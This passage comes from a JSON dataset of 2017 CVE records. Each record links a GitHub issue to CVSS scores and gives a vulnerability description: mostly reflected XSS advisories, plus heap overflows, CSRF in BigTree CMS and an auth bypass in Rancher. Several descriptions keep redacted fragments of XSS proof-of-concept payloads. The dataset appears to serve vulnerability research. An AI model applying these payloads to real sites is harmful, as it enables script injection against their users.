  13667. "Issue_Url_old": "https://github.com/mdadams/jasper/issues/114",
  13668. "Issue_Url_new": "https://github.com/jasper-software/jasper/issues/114",
  13669. "Repo_new": "jasper-software/jasper",
  13670. "Issue_Created_At": "2017-01-25T08:28:04Z",
  13671. "description": "heap based buffer overflow in jpc_dec_decodepkt (jpc_t2dec.c). On NUMBERTAG ERRORTAG Testcase: URLTAG",
  13672. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  13673. "severity": "HIGH",
  13674. "baseScore": 7.8,
  13675. "impactScore": 5.9,
  13676. "exploitabilityScore": 1.8
  13677. },
  13678. {
  13679. "CVE_ID": "CVE-2017-6905",
  13680. "Issue_Url_old": "https://github.com/concrete5/concrete5-legacy/issues/1947",
  13681. "Issue_Url_new": "https://github.com/concretecms/concrete5-legacy/issues/1947",
  13682. "Repo_new": "concretecms/concrete5-legacy",
  13683. "Issue_Created_At": "2017-03-13T17:44:36Z",
  13684. "description": "concrete5 \u2013 Multiple Cross Site Scripting (XSS) in APITAG Product: concrete5 Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in \u201cconcrete NUMBERTAG which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in multiple HTTP GET parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG URLTAG NUMBERTAG URLTAG",
  13685. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13686. "severity": "MEDIUM",
  13687. "baseScore": 6.1,
  13688. "impactScore": 2.7,
  13689. "exploitabilityScore": 2.8
  13690. },
  13691. {
  13692. "CVE_ID": "CVE-2017-6906",
  13693. "Issue_Url_old": "https://github.com/Xtraball/SiberianCMS/issues/217",
  13694. "Issue_Url_new": "https://github.com/xtraball/siberian/issues/217",
  13695. "Repo_new": "xtraball/siberian",
  13696. "Issue_Created_At": "2017-03-08T14:22:40Z",
  13697. "description": "APITAG \u2013 Cross Site Scripting (XSS). Product: APITAG Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in APITAG NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201clog\u201d HTTP GET parameter passed to the the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  13698. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13699. "severity": "MEDIUM",
  13700. "baseScore": 6.1,
  13701. "impactScore": 2.7,
  13702. "exploitabilityScore": 2.8
  13703. },
  13704. {
  13705. "CVE_ID": "CVE-2017-6907",
  13706. "Issue_Url_old": "https://github.com/Overv/Open.GL/issues/56",
  13707. "Issue_Url_new": "https://github.com/overv/open.gl/issues/56",
  13708. "Repo_new": "overv/open.gl",
  13709. "Issue_Created_At": "2017-03-13T17:48:44Z",
  13710. "description": "Open.GL \u2013 Cross Site Scripting (XSS). Product: Open.GL Download: FILETAG Vunlerable Version: latest version Tested Version: latest version Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in APITAG latest version\u201d, which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201ccontent\u201d HTTP GET parameter passed to the APITAG APITAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  13711. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13712. "severity": "MEDIUM",
  13713. "baseScore": 6.1,
  13714. "impactScore": 2.7,
  13715. "exploitabilityScore": 2.8
  13716. },
  13717. {
  13718. "CVE_ID": "CVE-2017-6908",
  13719. "Issue_Url_old": "https://github.com/concrete5/concrete5-legacy/issues/1948",
  13720. "Issue_Url_new": "https://github.com/concretecms/concrete5-legacy/issues/1948",
  13721. "Repo_new": "concretecms/concrete5-legacy",
  13722. "Issue_Created_At": "2017-03-13T17:45:51Z",
  13723. "description": "concrete5 \u2013 Cross Site Scripting (XSS) in APITAG Product: concrete5 Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in \u201cconcrete NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the APITAG HTTP GET parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  13724. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13725. "severity": "MEDIUM",
  13726. "baseScore": 6.1,
  13727. "impactScore": 2.7,
  13728. "exploitabilityScore": 2.8
  13729. },
  13730. {
  13731. "CVE_ID": "CVE-2017-6909",
  13732. "Issue_Url_old": "https://github.com/shish/shimmie2/issues/597",
  13733. "Issue_Url_new": "https://github.com/shish/shimmie2/issues/597",
  13734. "Repo_new": "shish/shimmie2",
  13735. "Issue_Created_At": "2017-03-03T17:19:36Z",
  13736. "description": "Shimmie \u2013 Cross Site Scripting (XSS) . Product: Shimmie Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered APITAG NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201clog\u201d HTTP GET parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG APITAG",
  13737. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13738. "severity": "MEDIUM",
  13739. "baseScore": 6.1,
  13740. "impactScore": 2.7,
  13741. "exploitabilityScore": 2.8
  13742. },
  13743. {
  13744. "CVE_ID": "CVE-2017-6914",
  13745. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/275",
  13746. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/275",
  13747. "Repo_new": "bigtreecms/bigtree-cms",
  13748. "Issue_Created_At": "2017-03-15T08:07:56Z",
  13749. "description": "Multiple Security Issue of CSRF at Few Parameters. ' Exploit Title : Multiple Security Issue of CSRF at Few Parameters ' Vulnerability Type : Cross Site Request Forgery (CAPEC NUMBERTAG CVETAG ) ' Reporting Date NUMBERTAG Author : MENTIONTAG MENTIONTAG MENTIONTAG ' Vendor Homepage : FILETAG ' Software Link : URLTAG ' Version NUMBERTAG and NUMBERTAG I. Abstract As quoted from the official site of APITAG CMS, APITAG CMS is an open source content management system built on PHP and APITAG It was created by \u2013 and for \u2013 user experience and content strategy experts. APITAG user system is designed for a single webmaster or large distributed teams. Users can be editors or publishers of a single page or the entire site. II. Introduction NUMBERTAG Cross Site Request Forgery (CSRF) Generally, CSRF is an attack that \u201cforces\u201d a user to do something that is basically \u201cunwanted\u201d in a web based application by utilizing the circumstance of the victim that is being authorized (login). In general, this kind of attack could be used because the absence of authentication process in doing a change or the absence of unique token that can allowed to process the related matter (the uniqueness of the token is usually given so the user wouldn\u2019t be troubled by typing password to changes that are not quite significant). In this situation, the problem related lack of CSRF token could be found at a few features such as Colophon Changing (like a feature to change a web footer easily), User Deletion, and Navigation Social Changing (changing the URL to the malicious one). Please kindly note , as we learn a few things at APITAG CMS, we found that the protection is given with the needs of APITAG header of the HTTP/S Request. For example, when we tried to do a APITAG of CSRF at the APITAG User\u201d Feature, the feature needs the APITAG parameter to \u201ccompletely finishing\u201d the APITAG But at those NUMBERTAG three) mentioned feature, the protection is not given yet NUMBERTAG Colophon Feature In simple, this feature allows the users to write their own footer at the sidebar. By default, the value of Colophon is APITAG on APITAG CMS\" with embedded URL at the Product Name NUMBERTAG Nav Soc Feature APITAG Social) The feature allows the users to put their own social network with the provided URL and logos to the sidebar that exist at the application. III. Summary of Issue As it has been delivered before, the security problem in this report has a relation with APITAG of CSRF Token\u201d at separated parameter that could affects some changes like NUMBERTAG Deleting the Registered User (both of NUMBERTAG and NUMBERTAG Change the Colophon Information (both of NUMBERTAG and NUMBERTAG and NUMBERTAG Change the Navigation Social (both of NUMBERTAG and NUMBERTAG IV. Information and Situation of this APITAG To be able to understand the existed problem, this section will be re explaining the problem specifically about some information which is related to the general running process or even the root of the existed problem NUMBERTAG Deleting the Registered User with CSRF APITAG at Document NUMBERTAG Change the Colophon with CSRF APITAG at Document NUMBERTAG Change the Navigation Social with CSRF APITAG at Document). V. Additional Information NUMBERTAG For completing the explanation, the APITAG explanation are completed by the videos APITAG at Youtube, provided at document and via direct email to Tim NUMBERTAG And also the script that could be used to execute the APITAG ( provided at Document and via direct email to Tim). VI. References NUMBERTAG PCI DSS NUMBERTAG point NUMBERTAG for CSRF NUMBERTAG CAPEC NUMBERTAG Cross Site Request Forgery CVETAG NUMBERTAG CVETAG : Cross Site Request Forgery CVETAG NUMBERTAG URLTAG NUMBERTAG URLTAG VII. Document: FILETAG",
  13750. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H",
  13751. "severity": "HIGH",
  13752. "baseScore": 7.1,
  13753. "impactScore": 4.2,
  13754. "exploitabilityScore": 2.8
  13755. },
  13756. {
  13757. "CVE_ID": "CVE-2017-6958",
  13758. "Issue_Url_old": "https://github.com/mantisbt-plugins/source-integration/issues/205",
  13759. "Issue_Url_new": "https://github.com/mantisbt-plugins/source-integration/issues/205",
  13760. "Repo_new": "mantisbt-plugins/source-integration",
  13761. "Issue_Created_At": "2017-03-16T16:29:10Z",
  13762. "description": "XSS in search page. Dmitry Ivanov d1m0ck URLTAG reported NUMBERTAG a security vulnerability in the Source Integration plugin's search results page, allowing an attacker to inject arbitrary HTML or javascript code (the latter, only if APITAG default CSP are disabled NUMBERTAG URLTAG",
  13763. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13764. "severity": "MEDIUM",
  13765. "baseScore": 6.1,
  13766. "impactScore": 2.7,
  13767. "exploitabilityScore": 2.8
  13768. },
  13769. {
  13770. "CVE_ID": "CVE-2017-6967",
  13771. "Issue_Url_old": "https://github.com/neutrinolabs/xrdp/issues/350",
  13772. "Issue_Url_new": "https://github.com/neutrinolabs/xrdp/issues/350",
  13773. "Repo_new": "neutrinolabs/xrdp",
  13774. "Issue_Created_At": "2016-03-23T12:44:53Z",
  13775. "description": "Homedir gets not correctly created at first login. I'm opening this as a new issue, although my problems have already been started to be discussed at NUMBERTAG which has been marked as \"closed\" before finding a solution for my specific problem. Short summary here: I built xrdp upstream version and have a problem when connecting to the server for the very first time with a user. The server should then create a homedir (via pam_mkhomedir). The server is a member of an active directory, PAM is configured to authenticate via samba/winbind and create home directories for users on their first login. This works perfectly for e.g. ssh or other services but not for xrdp. I had a look at bugs NUMBERTAG and NUMBERTAG which seem similar but have a different background. The problem of these referenced bugs is that VNC needs some time to start up before connecting to it so a timeout (loop) has been implemented. This is not the case here. In this bug, VNC starts but there seems to be a problem with the order a full PAM based authentification. xrdp is supposed to first do the PAM authentication (which would initially creating a users' home directory) and then start VNC. This seems not to work as expected somehow... In general, the home directory gets created somewhen, but obviously too late in the process so that VNC spits out the error lines ERRORTAG If I kill the Xvnc process (or completely restart xrdp) and try it again (after the homedir got created while the first login try), it works. If I create the user's home directory manually it also works. I wasn't able to let PAM create the homedir before VNC starts, I tried almost every possible order of \"session\" entries (especially those with pam_mkhomedir.so at the beginning).",
  13776. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
  13777. "severity": "HIGH",
  13778. "baseScore": 7.3,
  13779. "impactScore": 3.4,
  13780. "exploitabilityScore": 3.9
  13781. },
  13782. {
  13783. "CVE_ID": "CVE-2017-7202",
  13784. "Issue_Url_old": "https://github.com/slims/slims7_cendana/issues/50",
  13785. "Issue_Url_new": "https://github.com/slims/slims7_cendana/issues/50",
  13786. "Repo_new": "slims/slims7_cendana",
  13787. "Issue_Created_At": "2017-03-03T17:35:23Z",
  13788. "description": "APITAG NUMBERTAG Cendana \u2013 Multiple Cross Site Scripting (XSS) . Product: APITAG NUMBERTAG Cendana Download: URLTAG Vunlerable Version: latest version Tested Version: latest version Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered APITAG NUMBERTAG Cendana latest version\u201d, which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in the \u201cid\u201d HTTP GET parameter passed to the PATHTAG and PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG URLTAG NUMBERTAG URLTAG",
  13789. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13790. "severity": "MEDIUM",
  13791. "baseScore": 6.1,
  13792. "impactScore": 2.7,
  13793. "exploitabilityScore": 2.8
  13794. },
  13795. {
  13796. "CVE_ID": "CVE-2017-7203",
  13797. "Issue_Url_old": "https://github.com/ZoneMinder/ZoneMinder/issues/1797",
  13798. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/1797",
  13799. "Repo_new": "zoneminder/zoneminder",
  13800. "Issue_Created_At": "2017-02-28T14:49:23Z",
  13801. "description": "APITAG Cross Site Scripting (XSS). APITAG Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered a Cross Site Scripting (XSS) in APITAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in APITAG HTTP POST parameter passed to PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: Post: APITAG APITAG < To FILETAG",
  13802. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13803. "severity": "MEDIUM",
  13804. "baseScore": 6.1,
  13805. "impactScore": 2.7,
  13806. "exploitabilityScore": 2.8
  13807. },
  13808. {
  13809. "CVE_ID": "CVE-2017-7204",
  13810. "Issue_Url_old": "https://github.com/tboothman/imdbphp/issues/88",
  13811. "Issue_Url_new": "https://github.com/tboothman/imdbphp/issues/88",
  13812. "Repo_new": "tboothman/imdbphp",
  13813. "Issue_Created_At": "2017-02-27T18:18:59Z",
  13814. "description": "imdbphp (lastest version) Cross Site Scripting (XSS). Product\uff1aimdbphp Download: URLTAG Vunlerable Version: lastest version and probably prior Tested Version: lastest version Author: Haojun Hou in APITAG of Venustech Advisory Details: Haojun Hou in APITAG of Venustech discovered a Cross Site Scripting (XSS) in \u201cimdbphp\u201d, which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in \u201cname\u201d HTTP GET parameter passed to PATHTAG url. An attacker could execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  13815. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13816. "severity": "MEDIUM",
  13817. "baseScore": 6.1,
  13818. "impactScore": 2.7,
  13819. "exploitabilityScore": 2.8
  13820. },
  13821. {
  13822. "CVE_ID": "CVE-2017-7205",
  13823. "Issue_Url_old": "https://github.com/devryan/GamePanelX-V3/issues/161",
  13824. "Issue_Url_new": "https://github.com/devryan/gamepanelx-v3/issues/161",
  13825. "Repo_new": "devryan/gamepanelx-v3",
  13826. "Issue_Created_At": "2017-03-02T16:59:10Z",
  13827. "description": "APITAG NUMBERTAG Cross Site Scripting (XSS). Product: APITAG NUMBERTAG Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered APITAG NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201ca\u201d HTTP GET parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  13828. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13829. "severity": "MEDIUM",
  13830. "baseScore": 6.1,
  13831. "impactScore": 2.7,
  13832. "exploitabilityScore": 2.8
  13833. },
  13834. {
  13835. "CVE_ID": "CVE-2017-7231",
  13836. "Issue_Url_old": "https://github.com/Tatsh/pngdefry/issues/1",
  13837. "Issue_Url_new": "https://github.com/tatsh/pngdefry/issues/1",
  13838. "Repo_new": "tatsh/pngdefry",
  13839. "Issue_Created_At": "2017-03-22T17:16:53Z",
  13840. "description": "Heap Buffer Overflow Vulnerability in Pngdefry. This is to report a heap overflow vulnerability in Pngdefry. This issue affects the APITAG function of the 'pngdefry.c' source file. Valgrind reports Invalid write of size NUMBERTAG and Invalid read of size NUMBERTAG To reproduce this issue open the 'png file' with Pngdefry application. POC files attached below: FILETAG FILETAG FILETAG FILETAG",
  13841. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  13842. "severity": "HIGH",
  13843. "baseScore": 7.8,
  13844. "impactScore": 5.9,
  13845. "exploitabilityScore": 1.8
  13846. },
  13847. {
  13848. "CVE_ID": "CVE-2017-7235",
  13849. "Issue_Url_old": "https://github.com/Anorov/cloudflare-scrape/issues/97",
  13850. "Issue_Url_new": "https://github.com/anorov/cloudflare-scrape/issues/97",
  13851. "Repo_new": "anorov/cloudflare-scrape",
  13852. "Issue_Created_At": "2017-03-22T03:37:37Z",
  13853. "description": "Call APITAG My recommendation would be to remove the dependency on APITAG , but it looks like you don't want to go that way APITAG see this comment URLTAG , at least disable the pyimport statement, since it gives arbitrary code execution to any website that's scraped. And add the disclaimer that this library runs arbitrary code back to the README (which was removed in this commit URLTAG . You should also request a CVE ID.",
  13854. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  13855. "severity": "HIGH",
  13856. "baseScore": 8.8,
  13857. "impactScore": 5.9,
  13858. "exploitabilityScore": 2.8
  13859. },
  13860. {
  13861. "CVE_ID": "CVE-2017-7247",
  13862. "Issue_Url_old": "https://github.com/WhatCD/Gazelle/issues/114",
  13863. "Issue_Url_new": "https://github.com/whatcd/gazelle/issues/114",
  13864. "Repo_new": "whatcd/gazelle",
  13865. "Issue_Created_At": "2017-03-13T17:58:17Z",
  13866. "description": "Gazelle \u2013 Cross Site Scripting (XSS) in APITAG Product: Gazelle Download: URLTAG Vunlerable Version: latest version Tested Version: latest version Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in APITAG latest version\u201d, which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in multiple HTTP POST parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG Post: torrents= APITAG APITAG alert NUMBERTAG APITAG APITAG To FILETAG NUMBERTAG Post: size= \" /> APITAG alert NUMBERTAG APITAG <input text=\"type To FILETAG",
  13867. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13868. "severity": "MEDIUM",
  13869. "baseScore": 6.1,
  13870. "impactScore": 2.7,
  13871. "exploitabilityScore": 2.8
  13872. },
  13873. {
  13874. "CVE_ID": "CVE-2017-7248",
  13875. "Issue_Url_old": "https://github.com/WhatCD/Gazelle/issues/111",
  13876. "Issue_Url_new": "https://github.com/whatcd/gazelle/issues/111",
  13877. "Repo_new": "whatcd/gazelle",
  13878. "Issue_Created_At": "2017-03-13T17:55:06Z",
  13879. "description": "Gazelle \u2013 Cross Site Scripting (XSS) in APITAG Product: Gazelle Download: URLTAG Vunlerable Version: latest version Tested Version: latest version Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in APITAG latest version\u201d, which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201ctype\u201d HTTP GET parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  13880. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13881. "severity": "MEDIUM",
  13882. "baseScore": 6.1,
  13883. "impactScore": 2.7,
  13884. "exploitabilityScore": 2.8
  13885. },
  13886. {
  13887. "CVE_ID": "CVE-2017-7249",
  13888. "Issue_Url_old": "https://github.com/WhatCD/Gazelle/issues/112",
  13889. "Issue_Url_new": "https://github.com/whatcd/gazelle/issues/112",
  13890. "Repo_new": "whatcd/gazelle",
  13891. "Issue_Created_At": "2017-03-13T17:56:17Z",
  13892. "description": "Gazelle \u2013 Multiple Cross Site Scripting (XSS) in APITAG Product: Gazelle Download: URLTAG Vunlerable Version: latest version Tested Version: latest version Author: Haojun Hou in APITAG of Venustech Advisory Details: Multiple Cross Site Scripting (XSS) were discovered in APITAG latest version\u201d, which can be exploited to execute arbitrary code. The vulnerabilities exist due to insufficient filtration of user supplied data in multiple HTTP GET parameters passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: Poc NUMBERTAG URLTAG NUMBERTAG URLTAG",
  13893. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13894. "severity": "MEDIUM",
  13895. "baseScore": 6.1,
  13896. "impactScore": 2.7,
  13897. "exploitabilityScore": 2.8
  13898. },
  13899. {
  13900. "CVE_ID": "CVE-2017-7250",
  13901. "Issue_Url_old": "https://github.com/WhatCD/Gazelle/issues/113",
  13902. "Issue_Url_new": "https://github.com/whatcd/gazelle/issues/113",
  13903. "Repo_new": "whatcd/gazelle",
  13904. "Issue_Created_At": "2017-03-13T17:56:57Z",
  13905. "description": "Gazelle \u2013 Cross Site Scripting (XSS) in APITAG Product: Gazelle Download: URLTAG Vunlerable Version: latest version Tested Version: latest version Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in APITAG latest version\u201d, which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201caction\u201d HTTP GET parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: URLTAG",
  13906. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13907. "severity": "MEDIUM",
  13908. "baseScore": 6.1,
  13909. "impactScore": 2.7,
  13910. "exploitabilityScore": 2.8
  13911. },
  13912. {
  13913. "CVE_ID": "CVE-2017-7251",
  13914. "Issue_Url_old": "https://github.com/pi-engine/pi/issues/1523",
  13915. "Issue_Url_new": "https://github.com/pi-engine/pi/issues/1523",
  13916. "Repo_new": "pi-engine/pi",
  13917. "Issue_Created_At": "2017-03-08T14:24:46Z",
  13918. "description": "pi engine/pi \u2013 Cross Site Scripting (XSS). Product: pi engine/pi Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: Haojun Hou in APITAG of Venustech Advisory Details: A Cross Site Scripting (XSS) was discovered in \u201cpi engine/pi NUMBERTAG which can be exploited to execute arbitrary code. The vulnerability exists due to insufficient filtration of user supplied data in the \u201cpreview\u201d HTTP POST parameter passed to the the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Poc: Post: preview=> APITAG alert NUMBERTAG APITAG < To FILETAG",
  13919. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13920. "severity": "MEDIUM",
  13921. "baseScore": 6.1,
  13922. "impactScore": 2.7,
  13923. "exploitabilityScore": 2.8
  13924. },
  13925. {
  13926. "CVE_ID": "CVE-2017-7274",
  13927. "Issue_Url_old": "https://github.com/radare/radare2/issues/7152",
  13928. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/7152",
  13929. "Repo_new": "radareorg/radare2",
  13930. "Issue_Created_At": "2017-03-27T08:28:17Z",
  13931. "description": "Null pointer dereference in APITAG Null pointer dereference in APITAG Tested on Git HEAD: APITAG Payload ( PATHTAG ) in URLTAG To reproduce: APITAG ERRORTAG",
  13932. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  13933. "severity": "MEDIUM",
  13934. "baseScore": 5.5,
  13935. "impactScore": 3.6,
  13936. "exploitabilityScore": 1.8
  13937. },
  13938. {
  13939. "CVE_ID": "CVE-2017-7297",
  13940. "Issue_Url_old": "https://github.com/rancher/rancher/issues/8296",
  13941. "Issue_Url_new": "https://github.com/rancher/rancher/issues/8296",
  13942. "Repo_new": "rancher/rancher",
  13943. "Issue_Created_At": "2017-03-24T18:26:15Z",
  13944. "description": "Security Exposure: Any authenticated users can disable auth via API. Rancher Versions: Server NUMBERTAG Docker Version: Any OS and where are the hosts located? (cloud, bare metal, etc): Setup Details: (single node rancher vs. HA rancher, internal DB vs. external DB) Environment Type: ( PATHTAG ) Steps to Reproduce: Log into Rancher as an authenticated user (any role) and disable auth via the API. Results: Authentication is disabled.",
  13945. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  13946. "severity": "HIGH",
  13947. "baseScore": 8.8,
  13948. "impactScore": 5.9,
  13949. "exploitabilityScore": 2.8
  13950. },
  13951. {
  13952. "CVE_ID": "CVE-2017-7386",
  13953. "Issue_Url_old": "https://github.com/citymont/symetrie/issues/3",
  13954. "Issue_Url_new": "https://github.com/citymont/symetrie/issues/3",
  13955. "Repo_new": "citymont/symetrie",
  13956. "Issue_Created_At": "2017-03-24T03:24:50Z",
  13957. "description": "A Reflected XSS vulnerability in FILETAG . Hello: I have find a Reflected XSS vulnerability. The vulnerability exists due to insufficient filtration of user supplied data in \"model\" HTTP parameter that will be passed to \" PATHTAG The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG PATHTAG NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 sp NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
  13958. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13959. "severity": "MEDIUM",
  13960. "baseScore": 6.1,
  13961. "impactScore": 2.7,
  13962. "exploitabilityScore": 2.8
  13963. },
  13964. {
  13965. "CVE_ID": "CVE-2017-7387",
  13966. "Issue_Url_old": "https://github.com/TheFirstQuestion/HelpMeWatchWho/issues/1",
  13967. "Issue_Url_new": "https://github.com/thefirstquestion/helpmewatchwho/issues/1",
  13968. "Repo_new": "thefirstquestion/helpmewatchwho",
  13969. "Issue_Created_At": "2017-03-24T04:58:11Z",
  13970. "description": "A Reflected XSS vulnerability in FILETAG . Hello: I have find a Reflected XSS vulnerability. The vulnerability exists due to insufficient filtration of user supplied data in APITAG HTTP parameter that will be passed to APITAG APITAG The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 sp NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
  13971. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  13972. "severity": "MEDIUM",
  13973. "baseScore": 6.1,
  13974. "impactScore": 2.7,
  13975. "exploitabilityScore": 2.8
  13976. },
  13977. {
  13978. "CVE_ID": "CVE-2017-7388",
  13979. "Issue_Url_old": "https://github.com/micwallace/wallacepos/issues/84",
  13980. "Issue_Url_new": "https://github.com/micwallace/wallacepos/issues/84",
  13981. "Repo_new": "micwallace/wallacepos",
  13982. "Issue_Created_At": "2017-03-28T15:31:12Z",
